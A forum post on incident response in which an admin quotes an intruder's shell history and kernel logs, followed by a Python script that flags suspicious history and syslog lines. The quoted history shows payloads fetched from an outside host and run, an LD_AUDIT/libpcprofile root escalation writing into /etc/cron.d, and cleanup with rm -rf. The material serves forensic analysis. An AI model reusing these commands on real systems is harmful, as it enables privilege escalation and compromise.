I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked into this because my user is the only one with ssh access. I found this in an ftp user's .bash_history file:
w
uname -a
ls -a
sudo su
wget qiss.ucoz.de/2010/.jpg
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
rm -rf 2010.jpg
cd 2010/
ls -a
./2010
./2010x64
./2.6.31
uname -a
ls -a
./2.6.37-rc2
python rh2010.py
cd ..
ls -a
rm -rf 2010/
ls -a
wget qiss.ucoz.de/ubuntu2010_2.jpg
tar xzvf ubuntu2010_2.jpg
rm -rf ubuntu2010_2.jpg
./ubuntu2010-2
./ubuntu2010-2
./ubuntu2010-2
cat /etc/issue
umask 0
dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ping
gcc
touch a.sh
nano a.sh
vi a.sh
vim
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
nano ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
. .. a.sh .cache ubuntu10.sh ubuntu2010-2
ls -a
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe
passwd

The system is in a jail. Does it matter in the current case? What shall I do?
Thanks for everyone!!
I have done these:
- banned the connected ssh host with iptables
- stopped the sshd in the jail
- saved: bash_history, syslog, dmesg, the files from the wget lines in the bash_history
I installed rkhunter and unhide as well. I ran the "unhide sys" command and it found 1 hidden process. Now I'm running rkhunter... OK.
rkhunter -c gave some warnings:
in the jail:
Checking if SSH root access is allowed [ Warning ]
Checking for syslog configuration file [ Warning ]
Performing filesystem checks
Checking for hidden files and directories [ Warning ]

host system:
Performing filesystem checks
Checking /dev for suspicious file types [ Warning ]
Checking for hidden files and directories [ Warning ]
I found in dmesg and syslog that the hacker tried to do something with irda:
- syslog:
Feb 28 22:48:41 i386 kernel: [4180166.230061] irda_init()
Feb 28 22:48:41 i386 kernel: [4180166.230077] NET: Registered protocol family 23
Feb 28 22:48:46 i386 kernel: [4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: Called
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 22:49:33 i386 kernel: [4180218.465341] can: controller area network core (rev 20090105 abi 8)
Feb 28 22:49:33 i386 kernel: [4180218.465413] NET: Registered protocol family 29
Feb 28 22:49:33 i386 kernel: [4180218.493398] can: broadcast manager protocol (rev 20090105 t)
Feb 28 23:00:49 i386 kernel: [4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 23:17:01 i386 CRON[10126]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: /home/i is already mounted
- dmesg:
[4180166.230061] irda_init()
[4180166.230077] NET: Registered protocol family 23
[4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
[4180218.465341] can: controller area network core (rev 20090105 abi 8)
[4180218.465413] NET: Registered protocol family 29
[4180218.493398] can: broadcast manager protocol (rev 20090105 t)
[4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
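As an added example of how to triage evidence like the above (my own code, not from the post or from rkhunter/unhide): the script below runs a small set of hypothetical indicator rules over shell-history and syslog lines, extracts the hosts that files were fetched from (for firewalling and for sharing as indicators), and parses syslog lines into fields so a timeline can be built. The history and syslog samples are shortened copies of the lines in the post. Protocol family 23 is AF_IRDA and 29 is AF_CAN; those "Registered protocol family" messages appear when the kernel auto-loads a protocol module on demand, which is why they line up with the exploit binaries run from the history, even though nothing on the box legitimately uses IrDA or CAN.

```python
"""Triage helper for a suspected intrusion: flag suspicious history and
syslog lines, list download sources, parse syslog into fields.
Added example for this thread, not code from the original post. The
rules are hypothetical indicators chosen to match what the post shows,
not a complete detection ruleset."""
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass
class Finding:
    source: str   # "history" or "syslog"
    line: str     # the offending line, whitespace stripped
    reason: str   # why the rule flagged it


# Indicators for a .bash_history review: (pattern, explanation).
HISTORY_RULES = [
    (re.compile(r"\b(?:wget|curl)\s+\S+"), "remote file downloaded"),
    (re.compile(r"\btar\s+x\S*\s+\S+\.(?:jpe?g|png|gif)\b"),
     "archive extracted from a file with an image extension"),
    (re.compile(r"\bLD_(?:AUDIT|PRELOAD)="),
     "dynamic-loader variable set on the command line"),
    (re.compile(r"/etc/cron\.d/"), "path under /etc/cron.d referenced (persistence)"),
    (re.compile(r"^rm\s+-rf\s+"), "files deleted (possible cleanup of tools)"),
    (re.compile(r"^sudo\s+su\b|^su\b"), "root shell requested"),
    (re.compile(r"^\./\S+"), "binary executed from the working directory"),
    (re.compile(r"^(?:sh|bash)\s+\S+\.sh\b"), "shell script executed"),
    (re.compile(r"^umask\s+0+$"), "umask set to 0 (world-writable files)"),
    (re.compile(r"^passwd\b"), "account password changed"),
]

# Indicators for the kernel and sudo lines seen in syslog.
SYSLOG_RULES = [
    (re.compile(r"NET: Registered protocol family \d+"),
     "protocol module loaded on demand (check which module and why)"),
    (re.compile(r"ioctl32\(.*Unknown cmd"), "unknown ioctl sent to the kernel"),
    (re.compile(r"sudo: pam_sm_authenticate"), "sudo authentication"),
]

# Classic "Mon DD HH:MM:SS host proc[pid]: message" syslog layout.
SYSLOG_LINE = re.compile(
    r"^(?P<time>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+(?P<host>\S+)\s+"
    r"(?P<proc>[^:\[]+)(?:\[(?P<pid>\d+)\])?:\s+(?P<msg>.*)$")


def scan(lines, rules, source):
    """Return one Finding for every (line, rule) pair that matches."""
    findings = []
    for raw in lines:
        line = raw.strip()
        for pattern, reason in rules:
            if pattern.search(line):
                findings.append(Finding(source, line, reason))
    return findings


def download_hosts(history_lines):
    """Hosts that wget/curl fetched from: block them and record them as IoCs."""
    hosts = set()
    for line in history_lines:
        m = re.search(r"\b(?:wget|curl)\s+(\S+)", line)
        if m:
            url = m.group(1)
            if "://" not in url:
                url = "http://" + url   # wget treats a bare host/path as http
            hosts.add(urlsplit(url).hostname)
    return hosts


def parse_syslog(line):
    """Split a syslog line into time/host/proc/pid/msg; None if it does not parse."""
    m = SYSLOG_LINE.match(line.strip())
    return m.groupdict() if m else None


def summarize(findings):
    """Count findings by reason so the reviewer sees the pattern, not just lines."""
    return Counter(f.reason for f in findings)


# Sample input: shortened copies of the lines quoted in the post.
SAMPLE_HISTORY = [
    "w", "sudo su", "wget qiss.ucoz.de/2010.jpg", "tar xzvf 2010.jpg",
    "rm -rf 2010.jpg", "./2010x64", "python rh2010.py", "umask 0",
    'LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping',
    "wget qiss.ucoz.de/ubuntu10.sh", "sh ubuntu10.sh", "rm -rf ubuntu10.sh",
    "wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe",
    "passwd",
]
SAMPLE_SYSLOG = [
    "Feb 28 22:48:41 i386 kernel: [4180166.230061] irda_init()",
    "Feb 28 22:48:41 i386 kernel: [4180166.230077] NET: Registered protocol family 23",
    "Feb 28 22:48:46 i386 kernel: [4180171.242169] ioctl32(2.6.31:4726): Unknown cmd "
    "fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0",
    "Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: Called",
    "Feb 28 22:49:33 i386 kernel: [4180218.465413] NET: Registered protocol family 29",
    "Feb 28 23:17:01 i386 CRON[10126]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly)",
]

if __name__ == "__main__":
    found = scan(SAMPLE_HISTORY, HISTORY_RULES, "history") + \
        scan(SAMPLE_SYSLOG, SYSLOG_RULES, "syslog")
    for f in found:
        print(f"[{f.source}] {f.reason}: {f.line}")
    print("download sources:", sorted(download_hosts(SAMPLE_HISTORY)))
    for reason, n in summarize(found).most_common():
        print(f"{n:3d}  {reason}")
```

The reason counts are what to read first: a download followed by extraction of a ".jpg" that is really a tarball, a local binary run, an `LD_AUDIT` line pointing at `/etc/cron.d`, and then `rm -rf` of the tools is the sequence of a privilege-escalation attempt with cleanup, and the syslog module loads at 22:48 and 22:49 give it a time anchor even though `.bash_history` carries no timestamps. Run the same rules over every user's history on the host and in the jail, not only the ftp user's, since a shell obtained through `sudo su` writes root's history instead.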